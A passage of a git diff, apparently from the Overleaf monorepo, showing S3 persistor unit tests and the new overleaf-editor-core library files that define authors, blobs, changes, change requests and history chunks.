expect(Hash.read).to.have.been.called + }) + + it('should return the md5 hash', function () { + expect(hash).to.equal(md5) + }) + }) + }) + + describe('copyObject', function () { + describe('with valid parameters', function () { + beforeEach(async function () { + return S3Persistor.copyObject(bucket, key, destKey) + }) + + it('should copy the object', function () { + expect(S3Client.copyObject).to.have.been.calledWith({ + Bucket: bucket, + Key: destKey, + CopySource: `${bucket}/${key}`, + }) + }) + }) + + describe('when the file does not exist', function () { + let error + + beforeEach(async function () { + S3Client.copyObject = sinon.stub().returns({ + promise: sinon.stub().rejects(S3NotFoundError), + }) + try { + await S3Persistor.copyObject(bucket, key, destKey) + } catch (err) { + error = err + } + }) + + it('should throw a NotFoundError', function () { + expect(error).to.be.an.instanceOf(Errors.NotFoundError) + }) + }) + }) + + describe('deleteObject', function () { + describe('with valid parameters', function () { + beforeEach(async function () { + return S3Persistor.deleteObject(bucket, key) + }) + + it('should delete the object', function () { + expect(S3Client.deleteObject).to.have.been.calledWith({ + Bucket: bucket, + Key: key, + }) + }) + }) + }) + + describe('deleteDirectory', function () { + describe('with valid parameters', function () { + beforeEach(async function () { + return S3Persistor.deleteDirectory(bucket, key) + }) + + it('should list the objects in the directory', function () { + expect(S3Client.listObjectsV2).to.have.been.calledWith({ + Bucket: bucket, + Prefix: key, + }) + }) + + it('should delete the objects using their keys', function () { + expect(S3Client.deleteObjects).to.have.been.calledWith({ + Bucket: bucket, + Delete: { + Objects: [{ Key: 'llama' }, { Key: 'hippo' }], + Quiet: true, + }, + }) + }) + }) + + describe('when there are no files', function () { + beforeEach(async function () { + S3Client.listObjectsV2 = sinon + .stub() + .returns({ promise: sinon.stub().resolves({ Contents: [] }) }) + return S3Persistor.deleteDirectory(bucket, key) + }) + + it('should list the objects in the directory', function () { + expect(S3Client.listObjectsV2).to.have.been.calledWith({ + Bucket: bucket, + Prefix: key, + }) + }) + + it('should not try to delete any objects', function () { + expect(S3Client.deleteObjects).not.to.have.been.called + }) + }) + + describe('when there are more files available', function () { + const continuationToken = 'wombat' + beforeEach(async function () { + S3Client.listObjectsV2.onCall(0).returns({ + promise: sinon.stub().resolves({ + Contents: files, + IsTruncated: true, + NextContinuationToken: continuationToken, + }), + }) + + return S3Persistor.deleteDirectory(bucket, key) + }) + + it('should list the objects a second time, with a continuation token', function () { + expect(S3Client.listObjectsV2).to.be.calledTwice + expect(S3Client.listObjectsV2).to.be.calledWith({ + Bucket: bucket, + Prefix: key, + }) + expect(S3Client.listObjectsV2).to.be.calledWith({ + Bucket: bucket, + Prefix: key, + ContinuationToken: continuationToken, + }) + }) + + it('should delete both sets of files', function () { + expect(S3Client.deleteObjects).to.have.been.calledTwice + }) + }) + + describe('when there is an error listing the objects', function () { + let error + + beforeEach(async function () { + S3Client.listObjectsV2 = sinon + .stub() + .returns({ promise: sinon.stub().rejects(genericError) }) + try { + await S3Persistor.deleteDirectory(bucket, key) + } catch (err) { + error = err + } + }) + + it('should generate a ReadError', function () { + expect(error).to.be.an.instanceOf(Errors.ReadError) + }) + + it('should wrap the error', function () { + expect(error.cause).to.equal(genericError) + }) + + it('should not try to delete any objects', function () { + expect(S3Client.deleteObjects).not.to.have.been.called + }) + }) + + describe('when there is an error deleting the objects', function () { + let error + + beforeEach(async function () { + S3Client.deleteObjects = sinon + .stub() + .returns({ promise: sinon.stub().rejects(genericError) }) + try { + await S3Persistor.deleteDirectory(bucket, key) + } catch (err) { + error = err + } + }) + + it('should generate a WriteError', function () { + expect(error).to.be.an.instanceOf(Errors.WriteError) + }) + + it('should wrap the error', function () { + expect(error.cause).to.equal(genericError) + }) + }) + }) + + describe('directorySize', function () { + describe('with valid parameters', function () { + let size + + beforeEach(async function () { + size = await S3Persistor.directorySize(bucket, key) + }) + + it('should list the objects in the directory', function () { + expect(S3Client.listObjectsV2).to.have.been.calledWith({ + Bucket: bucket, + Prefix: key, + }) + }) + + it('should return the directory size', function () { + expect(size).to.equal(filesSize) + }) + }) + + describe('when there are no files', function () { + let size + + beforeEach(async function () { + S3Client.listObjectsV2 = sinon + .stub() + .returns({ promise: sinon.stub().resolves({ Contents: [] }) }) + size = await S3Persistor.directorySize(bucket, key) + }) + + it('should list the objects in the directory', function () { + expect(S3Client.listObjectsV2).to.have.been.calledWith({ + Bucket: bucket, + Prefix: key, + }) + }) + + it('should return zero', function () { + expect(size).to.equal(0) + }) + }) + + describe('when there are more files available', function () { + const continuationToken = 'wombat' + let size + beforeEach(async function () { + S3Client.listObjectsV2.onCall(0).returns({ + promise: sinon.stub().resolves({ + Contents: files, + IsTruncated: true, + NextContinuationToken: continuationToken, + }), + }) + + size = await S3Persistor.directorySize(bucket, key) + }) + + it('should list the objects a second time, with a continuation token', function () { + expect(S3Client.listObjectsV2).to.be.calledTwice + expect(S3Client.listObjectsV2).to.be.calledWith({ + Bucket: bucket, + Prefix: key, + }) + expect(S3Client.listObjectsV2).to.be.calledWith({ + Bucket: bucket, + Prefix: key, + ContinuationToken: continuationToken, + }) + }) + + it('should return the size of both sets of files', function () { + expect(size).to.equal(filesSize * 2) + }) + }) + + describe('when there is an error listing the objects', function () { + let error + + beforeEach(async function () { + S3Client.listObjectsV2 = sinon + .stub() + .returns({ promise: sinon.stub().rejects(genericError) }) + try { + await S3Persistor.directorySize(bucket, key) + } catch (err) { + error = err + } + }) + + it('should generate a ReadError', function () { + expect(error).to.be.an.instanceOf(Errors.ReadError) + }) + + it('should wrap the error', function () { + expect(error.cause).to.equal(genericError) + }) + }) + }) + + describe('checkIfObjectExists', function () { + describe('when the file exists', function () { + let exists + + beforeEach(async function () { + exists = await S3Persistor.checkIfObjectExists(bucket, key) + }) + + it('should get the object header', function () { + expect(S3Client.headObject).to.have.been.calledWith({ + Bucket: bucket, + Key: key, + }) + }) + + it('should return that the file exists', function () { + expect(exists).to.equal(true) + }) + }) + + describe('when the file does not exist', function () { + let exists + + beforeEach(async function () { + S3Client.headObject = sinon + .stub() + .returns({ promise: sinon.stub().rejects(S3NotFoundError) }) + exists = await S3Persistor.checkIfObjectExists(bucket, key) + }) + + it('should get the object header', function () { + expect(S3Client.headObject).to.have.been.calledWith({ + Bucket: bucket, + Key: key, + }) + }) + + it('should return that the file does not exist', function () { + expect(exists).to.equal(false) + }) + }) + + describe('when there is an error', function () { + let error + + beforeEach(async function () { + S3Client.headObject = sinon + .stub() + .returns({ promise: sinon.stub().rejects(genericError) }) + try { + await S3Persistor.checkIfObjectExists(bucket, key) + } catch (err) { + error = err + } + }) + + it('should generate a ReadError', function () { + expect(error).to.be.an.instanceOf(Errors.ReadError) + }) + + it('should wrap the upstream ReadError', function () { + expect(error.cause).to.be.an.instanceOf(Errors.ReadError) + }) + + it('should eventually wrap the error', function () { + expect(error.cause.cause).to.equal(genericError) + }) + }) + }) + + describe('_getClientForBucket', function () { + it('should return same instance for same bucket', function () { + const a = S3Persistor._getClientForBucket('foo') + const b = S3Persistor._getClientForBucket('foo') + expect(a).to.equal(b) + }) + it('should return different instance for different bucket', function () { + const a = S3Persistor._getClientForBucket('foo') + const b = S3Persistor._getClientForBucket('bar') + expect(a).to.not.equal(b) + }) + it('should return different instance for same bucket different computeChecksums', function () { + const a = S3Persistor._getClientForBucket('foo', false) + const b = S3Persistor._getClientForBucket('foo', true) + expect(a).to.not.equal(b) + }) + }) +}) diff --git a/libraries/object-persistor/tsconfig.json b/libraries/object-persistor/tsconfig.json new file mode 100644 index 0000000..d43bb24 --- /dev/null +++ b/libraries/object-persistor/tsconfig.json @@ -0,0 +1,7 @@ +{ + "extends": "../../tsconfig.backend.json", + "include": [ + "**/*.js", + "**/*.cjs" + ] +} diff --git a/libraries/overleaf-editor-core/.gitignore b/libraries/overleaf-editor-core/.gitignore new file mode 100644 index 0000000..869500a --- /dev/null +++ b/libraries/overleaf-editor-core/.gitignore @@ -0,0 +1,5 @@ +/coverage +/node_modules + +# managed by monorepo$ bin/update_build_scripts +.npmrc diff --git a/libraries/overleaf-editor-core/.nvmrc b/libraries/overleaf-editor-core/.nvmrc new file mode 100644 index 0000000..0254b1e --- /dev/null +++ b/libraries/overleaf-editor-core/.nvmrc @@ -0,0 +1 @@ +20.18.2 diff --git a/libraries/overleaf-editor-core/buildscript.txt b/libraries/overleaf-editor-core/buildscript.txt new file mode 100644 index 0000000..03b7f06 --- /dev/null +++ b/libraries/overleaf-editor-core/buildscript.txt @@ -0,0 +1,10 @@ +overleaf-editor-core +--dependencies=None +--docker-repos=gcr.io/overleaf-ops +--env-add= +--env-pass-through= +--esmock-loader=False +--is-library=True +--node-version=20.18.2 +--public-repo=False +--script-version=4.7.0 diff --git a/libraries/overleaf-editor-core/index.js b/libraries/overleaf-editor-core/index.js new file mode 100644 index 0000000..df3548c --- /dev/null +++ b/libraries/overleaf-editor-core/index.js @@ -0,0 +1,89 @@ +const AddCommentOperation = require('./lib/operation/add_comment_operation') +const Author = require('./lib/author') +const AuthorList = require('./lib/author_list') +const Blob = require('./lib/blob') +const Change = require('./lib/change') +const ChangeRequest = require('./lib/change_request') +const ChangeNote = require('./lib/change_note') +const Chunk = require('./lib/chunk') +const ChunkResponse = require('./lib/chunk_response') +const Comment = require('./lib/comment') +const DeleteCommentOperation = require('./lib/operation/delete_comment_operation') +const File = require('./lib/file') +const FileMap = require('./lib/file_map') +const History = require('./lib/history') +const Label = require('./lib/label') +const AddFileOperation = require('./lib/operation/add_file_operation') +const MoveFileOperation = require('./lib/operation/move_file_operation') +const SetCommentStateOperation = require('./lib/operation/set_comment_state_operation') +const EditFileOperation = require('./lib/operation/edit_file_operation') +const EditNoOperation = require('./lib/operation/edit_no_operation') +const SetFileMetadataOperation = require('./lib/operation/set_file_metadata_operation') +const NoOperation = require('./lib/operation/no_operation') +const Operation = require('./lib/operation') +const RestoreOrigin = require('./lib/origin/restore_origin') +const RestoreFileOrigin = require('./lib/origin/restore_file_origin') +const Origin = require('./lib/origin') +const OtClient = require('./lib/ot_client') +const TextOperation = require('./lib/operation/text_operation') +const EditOperation = require('./lib/operation/edit_operation') +const safePathname = require('./lib/safe_pathname') +const Snapshot = require('./lib/snapshot') +const util = require('./lib/util') +const V2DocVersions = require('./lib/v2_doc_versions') +const { + InsertOp, + RemoveOp, + RetainOp, + ScanOp, +} = require('./lib/operation/scan_op') +const TrackedChange = require('./lib/file_data/tracked_change') +const TrackedChangeList = require('./lib/file_data/tracked_change_list') +const TrackingProps = require('./lib/file_data/tracking_props') +const Range = require('./lib/range') +const CommentList = require('./lib/file_data/comment_list') +const LazyStringFileData = require('./lib/file_data/lazy_string_file_data') + +exports.AddCommentOperation = AddCommentOperation +exports.Author = Author +exports.AuthorList = AuthorList +exports.Blob = Blob +exports.Change = Change +exports.ChangeRequest = ChangeRequest +exports.ChangeNote = ChangeNote +exports.Chunk = Chunk +exports.ChunkResponse = ChunkResponse +exports.Comment = Comment +exports.DeleteCommentOperation = DeleteCommentOperation +exports.File = File +exports.FileMap = FileMap +exports.LazyStringFileData = LazyStringFileData +exports.History = History +exports.Label = Label +exports.AddFileOperation = AddFileOperation +exports.MoveFileOperation = MoveFileOperation +exports.SetCommentStateOperation = SetCommentStateOperation +exports.EditFileOperation = EditFileOperation +exports.EditNoOperation = EditNoOperation +exports.SetFileMetadataOperation = SetFileMetadataOperation +exports.NoOperation = NoOperation +exports.Operation = Operation +exports.RestoreOrigin = RestoreOrigin +exports.RestoreFileOrigin = RestoreFileOrigin +exports.Origin = Origin +exports.OtClient = OtClient +exports.TextOperation = TextOperation +exports.EditOperation = EditOperation +exports.safePathname = safePathname +exports.Snapshot = Snapshot +exports.util = util +exports.V2DocVersions = V2DocVersions +exports.ScanOp = ScanOp +exports.InsertOp = InsertOp +exports.RetainOp = RetainOp +exports.RemoveOp = RemoveOp +exports.TrackedChangeList = TrackedChangeList +exports.TrackedChange = TrackedChange +exports.Range = Range +exports.CommentList = CommentList +exports.TrackingProps = TrackingProps diff --git a/libraries/overleaf-editor-core/lib/author.js b/libraries/overleaf-editor-core/lib/author.js new file mode 100644 index 0000000..10d305f --- /dev/null +++ b/libraries/overleaf-editor-core/lib/author.js @@ -0,0 +1,72 @@ +'use strict' + +const assert = require('check-types').assert + +/** + * An author of a {@link Change}. We want to store user IDs, and then fill in + * the other properties (which the user can change over time) when changes are + * loaded. + * + * At present, we're assuming that all authors have a user ID; we may need to + * generalise this to cover users for whom we only have a name and email, e.g. + * from git. For now, though, this seems to do what we need. + */ +class Author { + /** + * @param {number} id + * @param {string} email + * @param {string} name + */ + constructor(id, email, name) { + assert.number(id, 'bad id') + assert.string(email, 'bad email') + assert.string(name, 'bad name') + + this.id = id + this.email = email + this.name = name + } + + /** + * Create an Author from its raw form. + * + * @param {Object} [raw] + * @return {Author | null} + */ + static fromRaw(raw) { + if (!raw) return null + return new Author(raw.id, raw.email, raw.name) + } + + /** + * Convert the Author to raw form for storage or transmission. + * + * @return {Object} + */ + toRaw() { + return { id: this.id, email: this.email, name: this.name } + } + + /** + * @return {number} + */ + getId() { + return this.id + } + + /** + * @return {string} + */ + getEmail() { + return this.email + } + + /** + * @return {string} + */ + getName() { + return this.name + } +} + +module.exports = Author diff --git a/libraries/overleaf-editor-core/lib/author_list.js b/libraries/overleaf-editor-core/lib/author_list.js new file mode 100644 index 0000000..f24c1f9 --- /dev/null +++ b/libraries/overleaf-editor-core/lib/author_list.js @@ -0,0 +1,45 @@ +/** @module */ + +'use strict' + +const _ = require('lodash') +const check = require('check-types') + +const Author = require('./author') + +/** + * Check that every member of the list is a number or every member is + * an Author value, disregarding null or undefined values. + * + * @param {Array.} authors author list + * @param {string} msg + */ +function assertV1(authors, msg) { + const authors_ = authors.filter(function (a) { + return a !== null && a !== undefined + }) + + if (authors_.length > 0) { + const checker = check.integer(authors_[0]) + ? check.assert.integer + : _.partial(check.assert.instance, _, Author) + _.each(authors_, function (author) { + checker(author, msg) + }) + } +} + +/** + * Check that every member of the list is a v2 author ID, disregarding + * null or undefined values. + * + * @param {Array.} authors author list + * @param {string} msg + */ +function assertV2(authors, msg) { + _.each(authors, function (author) { + check.assert.maybe.match(author, /^[0-9a-f]{24}$/, msg) + }) +} + +module.exports = { assertV1, assertV2 } diff --git a/libraries/overleaf-editor-core/lib/blob.js b/libraries/overleaf-editor-core/lib/blob.js new file mode 100644 index 0000000..7f1b7bb --- /dev/null +++ b/libraries/overleaf-editor-core/lib/blob.js @@ -0,0 +1,109 @@ +'use strict' + +const assert = require('check-types').assert +const OError = require('@overleaf/o-error') + +const TextOperation = require('./operation/text_operation') + +class NotFoundError extends OError { + constructor(hash) { + super(`blob ${hash} not found`, { hash }) + this.hash = hash + } +} + +/** + * Metadata record for the content of a file. + */ +class Blob { + static HEX_HASH_RX_STRING = '^[0-9a-f]{40,40}$' + static HEX_HASH_RX = new RegExp(Blob.HEX_HASH_RX_STRING) + + /** + * Size of the largest file that we'll read to determine whether we can edit it + * or not, in bytes. The final decision on whether a file is editable or not is + * based on the number of characters it contains, but we need to read the file + * in to determine that; so it is useful to have an upper bound on the byte + * length of a file that might be editable. + * + * The reason for the factor of 3 is as follows. We cannot currently edit files + * that contain characters outside of the basic multilingual plane, so we're + * limited to characters that can be represented in a single, two-byte UCS-2 + * code unit. Encoding the largest such value, 0xFFFF (which is not actually + * a valid character), takes three bytes in UTF-8: 0xEF 0xBF 0xBF. A file + * composed entirely of three-byte UTF-8 codepoints is the worst case; in + * practice, this is a very conservative upper bound. + * + * @type {number} + */ + static MAX_EDITABLE_BYTE_LENGTH_BOUND = 3 * TextOperation.MAX_STRING_LENGTH + + static NotFoundError = NotFoundError + + /** + * @param {string} hash + * @param {number} byteLength + * @param {number} [stringLength] + */ + constructor(hash, byteLength, stringLength) { + this.setHash(hash) + this.setByteLength(byteLength) + this.setStringLength(stringLength) + } + + static fromRaw(raw) { + if (raw) { + return new Blob(raw.hash, raw.byteLength, raw.stringLength) + } + return null + } + + toRaw() { + return { + hash: this.hash, + byteLength: this.byteLength, + stringLength: this.stringLength, + } + } + + /** + * Hex hash. + * @return {String} + */ + getHash() { + return this.hash + } + + setHash(hash) { + assert.match(hash, Blob.HEX_HASH_RX, 'bad hash') + this.hash = hash + } + + /** + * Length of the blob in bytes. + * @return {number} + */ + getByteLength() { + return this.byteLength + } + + setByteLength(byteLength) { + assert.integer(byteLength, 'bad byteLength') + this.byteLength = byteLength + } + + /** + * Utf-8 length of the blob content, if it appears to be valid UTF-8. + * @return {number|undefined} + */ + getStringLength() { + return this.stringLength + } + + setStringLength(stringLength) { + assert.maybe.integer(stringLength, 'bad stringLength') + this.stringLength = stringLength + } +} + +module.exports = Blob diff --git a/libraries/overleaf-editor-core/lib/change.js b/libraries/overleaf-editor-core/lib/change.js new file mode 100644 index 0000000..e36cda9 --- /dev/null +++ b/libraries/overleaf-editor-core/lib/change.js @@ -0,0 +1,352 @@ +'use strict' + +const _ = require('lodash') +const assert = require('check-types').assert +const pMap = require('p-map') + +const AuthorList = require('./author_list') +const Operation = require('./operation') +const Origin = require('./origin') +const Snapshot = require('./snapshot') +const FileMap = require('./file_map') +const V2DocVersions = require('./v2_doc_versions') + +/** + * @import Author from "./author" + * @import { BlobStore } from "./types" + */ + +/** + * A Change is a list of {@link Operation}s applied atomically by given + * {@link Author}(s) at a given time. + */ +class Change { + static PROJECT_VERSION_RX_STRING = '^[0-9]+\\.[0-9]+$' + static PROJECT_VERSION_RX = new RegExp(Change.PROJECT_VERSION_RX_STRING) + + /** + * @param {Array.} operations + * @param {Date} timestamp + * @param {number[] | Author[]} [authors] + * @param {Origin} [origin] + * @param {string[]} [v2Authors] + * @param {string} [projectVersion] + * @param {V2DocVersions} [v2DocVersions] + */ + constructor( + operations, + timestamp, + authors, + origin, + v2Authors, + projectVersion, + v2DocVersions + ) { + this.setOperations(operations) + this.setTimestamp(timestamp) + this.setAuthors(authors || []) + this.setOrigin(origin) + this.setV2Authors(v2Authors || []) + this.setProjectVersion(projectVersion) + this.setV2DocVersions(v2DocVersions) + } + + /** + * For serialization. + * + * @return {Object} + */ + toRaw() { + function toRaw(object) { + return object.toRaw() + } + const raw = { + operations: this.operations.map(toRaw), + timestamp: this.timestamp.toISOString(), + authors: this.authors, + } + if (this.v2Authors) raw.v2Authors = this.v2Authors + if (this.origin) raw.origin = this.origin.toRaw() + if (this.projectVersion) raw.projectVersion = this.projectVersion + if (this.v2DocVersions) raw.v2DocVersions = this.v2DocVersions.toRaw() + return raw + } + + static fromRaw(raw) { + if (!raw) return null + assert.array.of.object(raw.operations, 'bad raw.operations') + assert.nonEmptyString(raw.timestamp, 'bad raw.timestamp') + + // Hack to clean up bad data where author id of some changes was 0, instead of + // null. The root cause of the bug is fixed in + // https://github.com/overleaf/write_latex/pull/3804 but the bad data persists + // on S3 + let authors + if (raw.authors) { + authors = raw.authors.map( + // Null represents an anonymous author + author => (author === 0 ? null : author) + ) + } + + return new Change( + raw.operations.map(Operation.fromRaw), + new Date(raw.timestamp), + authors, + raw.origin && Origin.fromRaw(raw.origin), + raw.v2Authors, + raw.projectVersion, + raw.v2DocVersions && V2DocVersions.fromRaw(raw.v2DocVersions) + ) + } + + /** + * @return {Operation[]} + */ + getOperations() { + return this.operations + } + + setOperations(operations) { + assert.array.of.object(operations, 'Change: bad operations') + this.operations = operations + } + + getTimestamp() { + return this.timestamp + } + + setTimestamp(timestamp) { + assert.date(timestamp, 'Change: bad timestamp') + this.timestamp = timestamp + } + + /** + * @return {Array.} zero or more + */ + getAuthors() { + return this.authors + } + + setAuthors(authors) { + assert.array(authors, 'Change: bad author ids array') + if (authors.length > 1) { + assert.maybe.emptyArray( + this.v2Authors, + 'Change: cannot set v1 authors if v2 authors is set' + ) + } + AuthorList.assertV1(authors, 'Change: bad author ids') + + this.authors = authors + } + + /** + * @return {Array.} zero or more + */ + getV2Authors() { + return this.v2Authors + } + + setV2Authors(v2Authors) { + assert.array(v2Authors, 'Change: bad v2 author ids array') + if (v2Authors.length > 1) { + assert.maybe.emptyArray( + this.authors, + 'Change: cannot set v2 authors if v1 authors is set' + ) + } + AuthorList.assertV2(v2Authors, 'Change: not a v2 author id') + this.v2Authors = v2Authors + } + + /** + * @return {Origin | null | undefined} + */ + getOrigin() { + return this.origin + } + + setOrigin(origin) { + assert.maybe.instance(origin, Origin, 'Change: bad origin') + this.origin = origin + } + + /** + * @return {string | null | undefined} + */ + getProjectVersion() { + return this.projectVersion + } + + setProjectVersion(projectVersion) { + assert.maybe.match( + projectVersion, + Change.PROJECT_VERSION_RX, + 'Change: bad projectVersion' + ) + this.projectVersion = projectVersion + } + + /** + * @return {V2DocVersions | null | undefined} + */ + getV2DocVersions() { + return this.v2DocVersions + } + + setV2DocVersions(v2DocVersions) { + assert.maybe.instance( + v2DocVersions, + V2DocVersions, + 'Change: bad v2DocVersions' + ) + this.v2DocVersions = v2DocVersions + } + + /** + * If this Change references blob hashes, add them to the given set. + * + * @param {Set.} blobHashes + */ + findBlobHashes(blobHashes) { + for (const operation of this.operations) { + operation.findBlobHashes(blobHashes) + } + } + + /** + * If this Change contains any File objects, load them. + * + * @param {string} kind see {File#load} + * @param {BlobStore} blobStore + * @return {Promise} + */ + async loadFiles(kind, blobStore) { + for (const operation of this.operations) { + await operation.loadFiles(kind, blobStore) + } + } + + /** + * Append an operation to the end of the operations list. + * + * @param {Operation} operation + * @return {this} + */ + pushOperation(operation) { + this.getOperations().push(operation) + return this + } + + /** + * Apply this change to a snapshot. All operations are applied, and then the + * snapshot version is increased. + * + * Recoverable errors (caused by historical bad data) are ignored unless + * opts.strict is true + * + * @param {Snapshot} snapshot modified in place + * @param {object} opts + * @param {boolean} [opts.strict] - Do not ignore recoverable errors + */ + applyTo(snapshot, opts = {}) { + // eslint-disable-next-line no-unused-vars + for (const operation of this.iterativelyApplyTo(snapshot, opts)) { + // Nothing to do: we're just consuming the iterator for the side effects + } + } + + /** + * Generator that applies this change to a snapshot and yields each + * operation after it has been applied. + * + * Recoverable errors (caused by historical bad data) are ignored unless + * opts.strict is true + * + * @param {Snapshot} snapshot modified in place + * @param {object} opts + * @param {boolean} [opts.strict] - Do not ignore recoverable errors + */ + *iterativelyApplyTo(snapshot, opts = {}) { + assert.object(snapshot, 'bad snapshot') + + for (const operation of this.operations) { + try { + operation.applyTo(snapshot, opts) + } catch (err) { + const recoverable = + err instanceof Snapshot.EditMissingFileError || + err instanceof FileMap.FileNotFoundError + if (!recoverable || opts.strict) { + throw err + } + } + yield operation + } + + // update project version if present in change + if (this.projectVersion) { + snapshot.setProjectVersion(this.projectVersion) + } + + // update doc versions + if (this.v2DocVersions) { + snapshot.updateV2DocVersions(this.v2DocVersions) + } + } + + /** + * Transform this change to account for the fact that the other change occurred + * simultaneously and was applied first. + * + * This change is modified in place (by transforming its operations). + * + * @param {Change} other + */ + transformAfter(other) { + assert.object(other, 'bad other') + + const thisOperations = this.getOperations() + const otherOperations = other.getOperations() + for (let i = 0; i < otherOperations.length; ++i) { + for (let j = 0; j < thisOperations.length; ++j) { + thisOperations[j] = Operation.transform( + thisOperations[j], + otherOperations[i] + )[0] + } + } + } + + clone() { + return Change.fromRaw(this.toRaw()) + } + + async store(blobStore, concurrency) { + assert.maybe.number(concurrency, 'bad concurrency') + + const raw = this.toRaw() + raw.authors = _.uniq(raw.authors) + + const rawOperations = await pMap( + this.operations, + operation => operation.store(blobStore), + { concurrency: concurrency || 1 } + ) + raw.operations = rawOperations + return raw + } + + canBeComposedWith(other) { + const operations = this.getOperations() + const otherOperations = other.getOperations() + + // We ignore complex changes with more than 1 operation + if (operations.length > 1 || otherOperations.length > 1) return false + + return operations[0].canBeComposedWith(otherOperations[0]) + } +} + +module.exports = Change diff --git a/libraries/overleaf-editor-core/lib/change_note.js b/libraries/overleaf-editor-core/lib/change_note.js new file mode 100644 index 0000000..3704295 --- /dev/null +++ b/libraries/overleaf-editor-core/lib/change_note.js @@ -0,0 +1,61 @@ +'use strict' + +const assert = require('check-types').assert + +const Change = require('./change') + +/** + * A `ChangeNote` is returned when the server has applied a {@link Change}. + */ +class ChangeNote { + /** + * @param {number} baseVersion the new base version for the change + * @param {Change} [change] + */ + constructor(baseVersion, change) { + assert.integer(baseVersion, 'bad baseVersion') + assert.maybe.instance(change, Change, 'bad change') + + this.baseVersion = baseVersion + this.change = change + } + + /** + * For serialization. + * + * @return {Object} + */ + toRaw() { + return { + baseVersion: this.baseVersion, + change: this.change.toRaw(), + } + } + + toRawWithoutChange() { + return { + baseVersion: this.baseVersion, + } + } + + static fromRaw(raw) { + assert.integer(raw.baseVersion, 'bad raw.baseVersion') + assert.maybe.object(raw.change, 'bad raw.changes') + + return new ChangeNote(raw.baseVersion, Change.fromRaw(raw.change)) + } + + getBaseVersion() { + return this.baseVersion + } + + getResultVersion() { + return this.baseVersion + 1 + } + + getChange() { + return this.change + } +} + +module.exports = ChangeNote diff --git a/libraries/overleaf-editor-core/lib/change_request.js b/libraries/overleaf-editor-core/lib/change_request.js new file mode 100644 index 0000000..a5cbb2e --- /dev/null +++ b/libraries/overleaf-editor-core/lib/change_request.js @@ -0,0 +1,90 @@ +'use strict' + +const assert = require('check-types').assert + +const AuthorList = require('./author_list') +const Change = require('./change') +const Operation = require('./operation') + +/** + * @import Author from "./author" + */ + +/** + * A `ChangeRequest` is a list of {@link Operation}s that the server can apply + * as a {@link Change}. + * + * If the change is marked as `untransformable`, then the server will not + * attempt to transform it if it is out of date (i.e. if the baseVersion no + * longer matches the project's latest version). For example, if the client + * needs to ensure that a metadata property is set on exactly one file, it can't + * do that reliably if there's a chance that other clients will also change the + * metadata at the same time. The expectation is that if the change is rejected, + * the client will retry on a later version. + */ +class ChangeRequest { + /** + * @param {number} baseVersion + * @param {Array.} operations + * @param {boolean} [untransformable] + * @param {number[] | Author[]} [authors] + */ + constructor(baseVersion, operations, untransformable, authors) { + assert.integer(baseVersion, 'bad baseVersion') + assert.array.of.object(operations, 'bad operations') + assert.maybe.boolean(untransformable, 'ChangeRequest: bad untransformable') + // TODO remove authors once we have JWTs working --- pass as parameter to + // makeChange instead + authors = authors || [] + + // check all are the same type + AuthorList.assertV1(authors, 'bad authors') + + this.authors = authors + this.baseVersion = baseVersion + this.operations = operations + this.untransformable = untransformable || false + } + + /** + * For serialization. + * + * @return {Object} + */ + toRaw() { + function operationToRaw(operation) { + return operation.toRaw() + } + + return { + baseVersion: this.baseVersion, + operations: this.operations.map(operationToRaw), + untransformable: this.untransformable, + authors: this.authors, + } + } + + static fromRaw(raw) { + assert.array.of.object(raw.operations, 'bad raw.operations') + return new ChangeRequest( + raw.baseVersion, + raw.operations.map(Operation.fromRaw), + raw.untransformable, + raw.authors + ) + } + + getBaseVersion() { + return this.baseVersion + } + + isUntransformable() { + return this.untransformable + } + + makeChange(timestamp) { + return new Change(this.operations, timestamp, this.authors) + } +} + +module.exports = ChangeRequest diff --git a/libraries/overleaf-editor-core/lib/chunk.js b/libraries/overleaf-editor-core/lib/chunk.js new file mode 100644 index 0000000..929ecb0 --- /dev/null +++ b/libraries/overleaf-editor-core/lib/chunk.js @@ -0,0 +1,172 @@ +'use strict' + +const assert = require('check-types').assert +const OError = require('@overleaf/o-error') + +const History = require('./history') + +/** + * @import { BlobStore, RawChunk } from "./types" + * @import Change from "./change" + * @import Snapshot from "./snapshot" + */ + +class ConflictingEndVersion extends OError { + constructor(clientEndVersion, latestEndVersion) { + const message = + 'client sent updates with end_version ' + + clientEndVersion + + ' but latest chunk has end_version ' + + latestEndVersion + super(message, { clientEndVersion, latestEndVersion }) + this.clientEndVersion = clientEndVersion + this.latestEndVersion = latestEndVersion + } +} + +class NotFoundError extends OError { + // `message` and `info` optional arguments allow children classes to override + // these values, ensuring backwards compatibility with previous implementation + // based on the `overleaf-error-type` library + constructor(projectId, message, info) { + const errorMessage = message || `no chunks for project ${projectId}` + const errorInfo = info || { projectId } + super(errorMessage, errorInfo) + this.projectId = projectId + } +} + +class VersionNotFoundError extends NotFoundError { + constructor(projectId, version) { + super(projectId, `chunk for ${projectId} v ${version} not found`, { + projectId, + version, + }) + this.projectId = projectId + this.version = version + } +} + +class BeforeTimestampNotFoundError extends NotFoundError { + constructor(projectId, timestamp) { + super(projectId, `chunk for ${projectId} timestamp ${timestamp} not found`) + this.projectId = projectId + this.timestamp = timestamp + } +} + +class NotPersistedError extends NotFoundError { + constructor(projectId) { + super(projectId, `chunk for ${projectId} not persisted yet`) + this.projectId = projectId + } +} + +/** + * A Chunk is a {@link History} that is part of a project's overall history. It + * has a start and an end version that place its History in context. + */ +class Chunk { + static ConflictingEndVersion = ConflictingEndVersion + static NotFoundError = NotFoundError + static VersionNotFoundError = VersionNotFoundError + static BeforeTimestampNotFoundError = BeforeTimestampNotFoundError + static NotPersistedError = NotPersistedError + + /** + * @param {History} history + * @param {number} startVersion + */ + constructor(history, startVersion) { + assert.instance(history, History, 'bad history') + assert.integer(startVersion, 'bad startVersion') + + this.history = history + this.startVersion = startVersion + } + + /** + * @param {RawChunk} raw + * @return {Chunk} + */ + static fromRaw(raw) { + return new Chunk(History.fromRaw(raw.history), raw.startVersion) + } + + toRaw() { + return { history: this.history.toRaw(), startVersion: this.startVersion } + } + + /** + * The history for this chunk. + * + * @return {History} + */ + getHistory() { + return this.history + } + + /** + * {@see History#getSnapshot} + * @return {Snapshot} + */ + getSnapshot() { + return this.history.getSnapshot() + } + + /** + * {@see History#getChanges} + * @return {Array.} + */ + getChanges() { + return this.history.getChanges() + } + + /** + * {@see History#pushChanges} + * @param {Array.} changes + */ + pushChanges(changes) { + this.history.pushChanges(changes) + } + + /** + * The version of the project after applying all changes in this chunk. + * + * @return {number} non-negative, greater than or equal to start version + */ + getEndVersion() { + return this.startVersion + this.history.countChanges() + } + + /** + * The timestamp of the last change in this chunk + */ + + getEndTimestamp() { + if 